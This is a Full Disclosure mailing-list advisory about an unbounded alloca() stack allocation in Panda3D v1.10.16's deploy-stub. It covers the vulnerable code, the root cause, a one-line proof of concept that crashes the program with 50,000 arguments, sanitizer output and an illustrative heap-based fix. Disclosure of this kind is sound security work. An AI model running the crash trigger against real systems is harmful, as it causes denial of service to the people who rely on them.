Panda3d v1.10.16 deploy-stub Unbounded Stack Allocation Leading to Uninitialized Memory
The Panda3D deploy-stub has a memory-safety vulnerability: it allocates stack memory with alloca() without any bound or initialization, so an attacker who controls argc can cause stack exhaustion and use of uninitialized memory, leading to crashes and memory corruption. 2026-1-6 06:59:31 Author: seclists.org


Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Thu, 1 Jan 2026 02:27:18 -0500

A memory safety vulnerability exists in the Panda3D deploy-stub executable
due to unbounded stack allocation using attacker-controlled input. The
issue allows a local attacker to trigger stack exhaustion and subsequent
use of uninitialized memory during Python interpreter initialization,
resulting in a reliable crash and undefined behavior. The vulnerability is
confirmed by MemorySanitizer (MSAN) as a use-of-uninitialized-value
originating from stack memory.

The deploy-stub executable allocates memory on the stack using alloca()
based directly on the process argument count (argc), which is fully
attacker-controlled. No bounds checking or validation is performed prior to
allocation.
*Vulnerable Code:*
if (argc > 0) {
    argv_copy  = (wchar_t **)alloca(sizeof(wchar_t *) * argc);
    argv_copy2 = (wchar_t **)alloca(sizeof(wchar_t *) * argc);
}
Because alloca() allocates memory on the stack without initialization,
large values of argc cause excessive stack consumption and propagate
uninitialized stack memory into subsequent logic. During Python interpreter
initialization, this uninitialized data is later consumed by string
handling routines (strlen, strcmp), resulting in undefined behavior.

*Root Cause:*
* argc is attacker-controlled
* alloca() performs unbounded stack allocation
* Allocated memory is not initialized
* Stack exhaustion causes corruption and exposure of uninitialized stack bytes
* Python initialization code consumes this tainted memory
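As an added illustration (not code from the Panda3D project or from the advisory author), the following shows the alloca() pattern quoted above next to a heap-based alternative that bounds argc, guards the size multiplication against overflow, and relies on calloc() zero-filling so no uninitialized bytes reach the interpreter. The max_args policy limit, the sample argv and the helper names are assumptions of this example.

```c
#include <stdlib.h>
#include <stdint.h>
#include <wchar.h>
/* The advisory's pattern, kept for comparison and never called here:
 *   argv_copy = (wchar_t **)alloca(sizeof(wchar_t *) * argc);
 * argc is unbounded and the stack bytes are left uninitialised. */

/* Reject counts that would overflow the size computation or exceed a
 * caller-chosen policy limit. max_args is an assumption of this example. */
static int argc_is_sane(int argc, size_t max_args) {
    if (argc <= 0 || (size_t)argc > max_args) return 0;
    return (size_t)argc <= SIZE_MAX / sizeof(wchar_t *);
}

/* Heap copy of argv as wide strings. calloc() zero-fills, so every slot is
 * NULL or a terminated string; nothing uninitialised reaches the interpreter.
 * Returns NULL on any failure after releasing partial work. */
static wchar_t **copy_args_heap(int argc, char **argv, size_t max_args) {
    if (!argc_is_sane(argc, max_args) || argv == NULL) return NULL;
    wchar_t **out = calloc((size_t)argc + 1, sizeof(wchar_t *));
    if (out == NULL) return NULL;
    for (int i = 0; i < argc; i++) {
        size_t n = mbstowcs(NULL, argv[i], 0);     /* length without NUL */
        if (n == (size_t)-1) goto fail;             /* invalid multibyte text */
        out[i] = calloc(n + 1, sizeof(wchar_t));
        if (out[i] == NULL || mbstowcs(out[i], argv[i], n + 1) == (size_t)-1)
            goto fail;
    }
    return out;                                     /* out[argc] stays NULL */
fail:
    for (int i = 0; i < argc; i++) free(out[i]);
    free(out);
    return NULL;
}

static void free_args(wchar_t **args) {
    if (args == NULL) return;
    for (size_t i = 0; args[i] != NULL; i++) free(args[i]);
    free(args);
}
/* Constructed sample argv; the real deploy-stub receives it from the OS. */
static char *sample_argv[] = { "deploy-stub", "A", "B" };
/* Round-trips the sample and returns 1 when every argument survived intact. */
static int demo_roundtrip(void) {
    wchar_t **w = copy_args_heap(3, sample_argv, 4096);
    int ok = w != NULL && wcscmp(w[0], L"deploy-stub") == 0 &&
             wcscmp(w[1], L"A") == 0 && wcscmp(w[2], L"B") == 0 && w[3] == NULL;
    free_args(w);
    return ok;
}
```

With the bound in place an argc of 50000 (the advisory's PoC size) is rejected before any allocation happens, while normal argument counts are copied onto zero-initialised heap memory.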

*Impact:*
* *Denial of Service (DoS):* Reliable crash of deploy-stub
* *Memory Corruption:* Use of uninitialized stack memory (MSAN-verified)
* *Pre-authentication:* Triggered immediately on process start
* *Undefined Behavior:* Execution proceeds with corrupted stack state

*Proof of Concept:*
./deploy-stub $(printf 'A %.0s' {1..50000})


*Output:*
Uninitialized bytes in strlen at offset 3 inside [0xe01000000050, 8)
==3236655==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0xffffa06b66d4 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b66d4) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #1 0xffffa06b3424 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b3424) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #2 0xffffa06b67a4 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b67a4) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #3 0xffffa06b6cc4 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b6cc4) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #4 0xffffa06b711c (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b711c) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #5 0xffffa06feccc (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2feccc) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #6 0xffffa06daf68 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2daf68) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #7 0xffffa06dc324 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2dc324) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #8 0xffffa06e04d0 in Py_InitializeFromConfig (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2e04d0) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #9 0xffffa06e06c0 in Py_InitializeEx (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2e06c0) (BuildId: 9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #10 0xaaaaba2aa0f0 in Py_FrozenMain /root/panda3d/pandatool/src/deploy-stub/deploy-stub.c:466:5
    #11 0xaaaaba2ab9d8 in main /root/panda3d/pandatool/src/deploy-stub/deploy-stub.c:751:12
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/



Source: https://seclists.org/fulldisclosure/2026/Jan/9